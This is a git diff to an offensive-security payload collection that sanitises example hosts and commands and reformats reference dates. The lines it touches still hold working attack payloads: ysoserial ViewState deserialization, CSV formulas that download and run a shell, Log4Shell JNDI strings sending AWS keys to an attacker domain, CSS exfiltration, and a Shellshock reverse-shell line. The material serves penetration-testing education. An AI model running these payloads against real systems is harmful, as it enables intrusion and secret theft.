diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
index 8210e85879..2898b21d94 100644
--- a/API Key Leaks/IIS-Machine-Keys.md	
+++ b/API Key Leaks/IIS-Machine-Keys.md	
@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
     ```
 
 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
 ### MAC Is Not Enabled
 
 ```ps1
-ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
+ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
 ```
 
 ### MAC Is Enabled And Encryption Is Disabled
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 
     # --generator = `__VIEWSTATEGENERATOR` parameter value
     # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
     ```
 
 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
     ```
 
 ## Edit Cookies With The Machine Key
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index bc4810b658..5b3dddd1df 100644
--- a/Account Takeover/README.md	
+++ b/Account Takeover/README.md	
@@ -33,17 +33,17 @@
 ### Account Takeover Through Password Reset Poisoning
 
 1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
 3. Forward the request with the modified header
 
     ```http
     POST https://example.com/reset.php HTTP/1.1
     Accept: */*
     Content-Type: application/json
-    Host: attacker.com
+    Host: [ATTACKER.DOMAIN.TLD]
     ```
 
-4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
+4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
 
 ### Password Reset via Email Parameter
 
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
 
     ```powershell
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: 
     ```
 
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 
     0
 
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: X
     ```
 
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
 
 ### Account Takeover via JWT
 
-JSON Web Token might be used to authenticate an user.
+JSON Web Token might be used to authenticate a user.
 
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature
diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md
index b7df79d7dd..41ef4f3d62 100644
--- a/Business Logic Errors/README.md	
+++ b/Business Logic Errors/README.md	
@@ -89,7 +89,7 @@ In this example, instead of rounding and rejecting or enforcing a minimum transf
 
 ## References
 
-* [Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
-* [Business Logic Vulnerability - OWASP - 2024](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
+* [Business Logic Vulnerabilities - PortSwigger - March 5, 2026](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
+* [Business Logic Vulnerability - OWASP - April 22, 2020](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
 * [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://web.archive.org/web/20260304013031/https://cwe.mitre.org/data/definitions/840.html)
-* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
+* [Examples of Business Logic Vulnerabilities - PortSwigger - September 22, 2020](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index da5febe720..5c40151b70 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
 
 - Payloads must be sanitized
     - Use `id`, and `whoami`, for RCE Proof of Concepts
-    - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
+    - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
     - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
     - Use `Administrator` for privileged users and `User` for normal account
     - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 88072543d9..084954e9b8 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -269,6 +269,6 @@ function reqListener() {
 * [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
 * [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors)
 * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200)
-* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - October 14, 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
-* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14, 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
diff --git a/CSS Injection/README.md b/CSS Injection/README.md
index 898b58f1eb..346e80b48a 100644
--- a/CSS Injection/README.md	
+++ b/CSS Injection/README.md	
@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
 
 ```css
 input[name="pin"][value="1234"] {
-  background: url(https://attacker.com/log?pin=1234);
+  background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
 }
 ```
 
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
 
 ```css
 input[name="csrf-token"][value^="a"] + input {
-  background: url(https://example.com?q=a)
+  background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
 }
 ```
 
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
 This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
 
 ```html
-<style>@import url(http://attacker.com/staging?len=32);</style>
-<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
+<style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
+<style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
 ```
 
 Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.
@@ -192,7 +192,7 @@ Payload example using `fontleak` with a custom selector, parent element, and alp
 * [CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015](https://web.archive.org/web/20260212042745/https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)
 * [CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025](https://web.archive.org/web/20250601232405/https://blog.voorivex.team/css-data-exfiltration-to-steal-oauth-token)
 * [CSS Injection - xsleaks.dev - May 9, 2025](https://web.archive.org/web/20260114161847/https://xsleaks.dev/docs/attacks/css-injection/)
-* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - 2019](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
+* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - September 28, 2025](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
 * [CSS Injection: Attacking with Just CSS (Part 2) - aszx87410 - September 24, 2023](https://web.archive.org/web/20231223213409/https://aszx87410.github.io/beyond-xss/en/ch3/css-injection-2/)
 * [Fontleak: exfiltrating text using CSS and Ligatures - Dragos Albastroiu - April 16, 2025](https://web.archive.org/web/20251130021102/https://adragos.ro/fontleak/)
 * [How you can steal private data through CSS injection - invicti - April 23, 2018](https://web.archive.org/web/20251107094938/https://www.invicti.com/blog/web-security/private-data-stolen-exploiting-css-injection)
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index f4607f34fb..51f80f2af8 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -12,7 +12,7 @@
 
 CSV Injection, also known as Formula Injection, is a security vulnerability that occurs when untrusted input is included in a CSV file. Any formula can be started with:
 
-```powershell
+```text
 =
 +
 –
@@ -23,7 +23,7 @@ Basic exploits with **Dynamic Data Exchange**.
 
 * Spawn a calc
 
-    ```powershell
+    ```text
     DDE ("cmd";"/C calc";"!A0")A0
     @SUM(1+1)*cmd|' /C calc'!A0
     =2+5+cmd|' /C calc'!A0
@@ -32,13 +32,13 @@ Basic exploits with **Dynamic Data Exchange**.
 
 * PowerShell download and execute
 
-    ```powershell
+    ```text
     =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
     ```
 
 * Prefix obfuscation and command chaining
 
-    ```powershell
+    ```text
     =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
     =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
     =         cmd|'/c calc.exe'!A
@@ -46,14 +46,14 @@ Basic exploits with **Dynamic Data Exchange**.
 
 * Using rundll32 instead of cmd
 
-    ```powershell
+    ```text
     =rundll32|'URL.dll,OpenURL calc.exe'!A
     =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
     ```
 
 * Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
 
-    ```powershell
+    ```text
     =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
     ```
 
@@ -75,18 +75,18 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
 
 So one can test blind formula injection or a potential for data exfiltration with:
 
-```c
-=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
+```text
+=IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
 ```
 
 Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
 
 ## References
 
-* [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://web.archive.org/web/20260211194330/https://owasp.org/www-community/attacks/CSV_Injection)
+* [CSV Excel Macro Injection - Timo Goosen, Albinowax - June 21, 2022](https://web.archive.org/web/20260211194330/https://owasp.org/www-community/attacks/CSV_Injection)
 * [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://web.archive.org/web/20251126193606/https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
-* [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://web.archive.org/web/20221205154959/https://payatu.com/csv-injection-basic-to-exploit/)
-* [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://web.archive.org/web/20251020005639/https://blog.xpnsec.com/from-csv-to-meterpreter/)
-* [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](https://web.archive.org/web/20260216175809/https://georgemauer.net/2017/10/07/csv-injection.html)
+* [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - November 30, 2017](https://web.archive.org/web/20221205154959/https://payatu.com/csv-injection-basic-to-exploit/)
+* [From CSV to Meterpreter - Adam Chester - November 5, 2015](https://web.archive.org/web/20251020005639/https://blog.xpnsec.com/from-csv-to-meterpreter/)
+* [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - October 7, 2017](https://web.archive.org/web/20260216175809/https://georgemauer.net/2017/10/07/csv-injection.html)
 * [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://web.archive.org/web/20220928031043/https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
 * [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://web.archive.org/web/20260115180627/https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md
index 4d9a9e5989..31f48dc2b0 100644
--- a/CVE Exploits/Log4Shell.md	
+++ b/CVE Exploits/Log4Shell.md	
@@ -45,13 +45,13 @@ bundle:config:db.password
 
 ## Scanning
 
-* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+* [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
 
     ```powershell
     usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
                         [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
-    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
-    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+    python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
+    python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
     ```
 
 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
@@ -59,16 +59,16 @@ bundle:config:db.password
 ## WAF Bypass
 
 ```powershell
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
 
 # using lower and upper
-${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
-${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
+${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
 
 # using env to create the letter
-${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
 ```
 
 ## Exploitation
@@ -76,32 +76,32 @@ ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attack
 ### Environment variables exfiltration
 
 ```powershell
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
 
 # AWS Access Key
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
 ```
 
 ### Remote Command Execution
 
-* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+* [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
 
     ```ps1
-    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
-    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
-    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
-    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
-    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+    java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
+    Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
+    Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
+    Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
+    Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
     ```
 
-* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+* [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
 
 ## References
 
-* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
-* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
-* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md
index c0c318b791..38a0062b3d 100644
--- a/CVE Exploits/README.md	
+++ b/CVE Exploits/README.md	
@@ -78,8 +78,8 @@ curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/44
 
 ## References
 
-* [Heartbleed - Official website](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
-* [Shellshock - Wikipedia](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
-* [Imperva Apache Struts analysis](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
-* [EternalBlue - Wikipedia](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
-* [BlueKeep - Microsoft](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
+* [The Heartbleed Bug - Heartbleed - April 7, 2014](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
+* [Shellshock (software bug) - Wikipedia - September 29, 2014](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
+* [Apache Struts Equifax Hack Analysis Part 1: CVE-2017-5638 - Imperva - March 9, 2017](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
+* [EternalBlue - Wikipedia - March 4, 2026](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
+* [CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability - Microsoft - November 4, 2020](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md
index 2833b199b1..f8a863c549 100644
--- a/Client Side Path Traversal/README.md	
+++ b/Client Side Path Traversal/README.md	
@@ -61,12 +61,12 @@ Real-World Scenarios:
 
 ## References
 
-* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
-* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
-* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
-* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
-* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
-* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
+* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
+* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
+* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24, 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
+* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - August 30, 2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
+* [On-site request forgery - Dafydd Stuttard - May 3, 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
+* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - May 10, 2024](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
 * [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://web.archive.org/web/20241004042613/https://vitorfalcao.com/posts/automating-cspt-discovery/)
 * [CSPT the Eval Villain Way! - Dennis Goodlett - December 3, 2024](https://web.archive.org/web/20241203171704/https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html)
 * [Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Maxence Schmitt - January 9, 2025](https://web.archive.org/web/20250109093347/https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 40394b282b..337f015259 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
